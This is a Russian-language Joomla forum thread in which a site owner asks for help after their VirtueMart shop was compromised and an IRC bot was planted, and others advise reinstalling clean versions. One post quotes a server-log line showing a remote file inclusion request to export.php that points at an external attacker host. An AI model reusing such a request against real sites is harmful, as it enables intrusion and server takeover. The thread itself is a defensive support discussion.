Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 3240 Просмотров
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
всем привет :)
есть проблема следующего характера: от хостера приходят уведомления о запуске от моего аккаунта вредоносных программ :)

версия Joomla - 1.5.8
версия  VirtueMart - 1.1.0

после первого уведомления сайты заблокировали и предложили самостоятельно разобраться с содержимым сайтов... помогать хостер вообще отказался
к сожалению, на тот момент логи обращений не велись. я вообще довольно далек от веб безопасности и банально не очень хорошо представляю себе как все функционирует. поэтому в тот раз не получилось выявить как и откуда была проведена атака

зараженный файлик был выявлен банальным сканом слитого сайта НОДом
был произведен апгрейд Joomla до 1.5.9 и заменены все пароли (БД, админка, ФТП)
но тем не менее, сегодня ситуация повторилась :)

судя по всему, вот сама атака...
"GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/injek.txt? HTTP/1.0" 403 4188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5"
79.140.241.1 - - [27/Apr/2009:09:36:23 +0400]

ну и я могу радостно наблюдать у себя на ФТП каталог с Eggdrop (бот для IRC)

ну и теперь самое важное для меня - что же, собственно, нужно сделать?
как мне кажется, нужно обновить виртумарт, но не понятно куда, т.к. у меня и так стоит последняя версия...
лезть в код export.php для поиска чего бы то ни было не могу, т.к. вообще ничего не понимаю в PHP

если кто сможет подсказать что-то полезное по решению проблемы, буду очень благодарен :)
*

beagler

  • Moderator
  • 3276
  • 392 / 4
  • https://alorisman.ru/
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #2 : 28.04.2009, 15:35:34 »
спасибо за ответ!
что-то не догадался проверить наличие такого файла в оригинальном дистрибутиве :)
попробую переставить все и сообщу о результатах...
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #3 : 28.04.2009, 18:33:21 »
кстати посмотрел на локальном компе - есть такой файлик :)
лежит в \administrator\components\com_virtuemart\

так что вопрос открыт...
*

Messer

  • Захожу иногда
  • 54
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #4 : 28.04.2009, 18:36:09 »
Хм))) откуда дистриб качал? ))))
Вывод прост) либо уже скачал с ним, либо подцепил шота... и он дописал куда надо, то что надо)))

Ставь антивирь... потом качай заново дистриб с официального сайта... и переставляй
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #5 : 28.04.2009, 21:31:40 »
качал отсюда :)
точнее - http://joomlaforum.ru/index.php/topic,32770.0.html
спасибо за советы!

все скачаю еще раз
есть только вопрос - можно ли пользоваться старой SQL базой с зараженного сайта? :)
подозреваю, что вопрос дурацкий и ответ - конечно можно, это вообще не связанные вещи
но лучше еще раз убедиться
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #7 : 01.05.2009, 10:26:43 »
всем привет еще раз :)
на чистой машине установил новые версии Joomla и виртумарта (скачанного с virtuemart.net)
файл  export.php ЕСТЬ в директории administrator\components\com_virtuemart

я же не выдумываю :)
просто сделал одно и то же с одинаковым результатом на 3-х независимых машинах (последняя чистая)
вопрос - его точно не должно быть в оригинальных сборках?
проверил 4 раза

может кто 1 раз проверит тоже? :)
*

Sulpher

  • Живу я здесь
  • 2136
  • 402 / 16
  • Шаблоны и расширения Joomla
Re: атака на сайт через VirtueMart
« Ответ #8 : 01.05.2009, 10:38:09 »
Цитировать
файл  export.php ЕСТЬ в директории administrator\components\com_virtuemart
В Virtuemart 1.1.3 файл export.php есть.

К вопросу об уязвимости.

Спойлер
[свернуть]

Попробуйте связку Joomla 1.5.10 + Virtuemart 1.1.3 - работает без проблем.
*

uhoplan

  • Новичок
  • 9
  • 0 / 0
Re: атака на сайт через VirtueMart
« Ответ #9 : 02.05.2009, 16:43:34 »
большущее спасибо за помощь!
все переустановил
единственное, при попытке экспорта и последующего импорта базы на новый (чистый) сайт возникли проблемы..
походу база была запорота во время взлома...
в результате пришлось убрать эти таблицы из (не в ладах я с терминологией :))
ну и все далее прошло нормально

если будут глюки или повторные взломы - сообщу

еще раз спасибо!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Количество просмотров товара VirtueMart Существует?

Автор grishin

Ответов: 38
Просмотров: 13146
Последний ответ 22.08.2020, 08:44:29
от rsn
Не выводит списком Настраиваемое поле в VirtueMart 5.0

Автор ЛюдмилаМир

Ответов: 2
Просмотров: 3662
Последний ответ 25.08.2019, 16:27:04
от ЛюдмилаМир
Joomla VirtueMart помощь в переводе

Автор akkord31

Ответов: 0
Просмотров: 3492
Последний ответ 21.05.2019, 09:14:02
от akkord31
Миграция с Joomla 1.5 на 3 с VirtueMart 1.1.9 stable на свежую. Кто поможет?

Автор Гриша-Десантник

Ответов: 7
Просмотров: 3831
Последний ответ 23.04.2019, 10:22:25
от draff
Переход на https VirtueMart 1.1.4 проблемы с фото

Автор Sergey1984

Ответов: 4
Просмотров: 3850
Последний ответ 25.10.2018, 20:56:54
от Sergey1984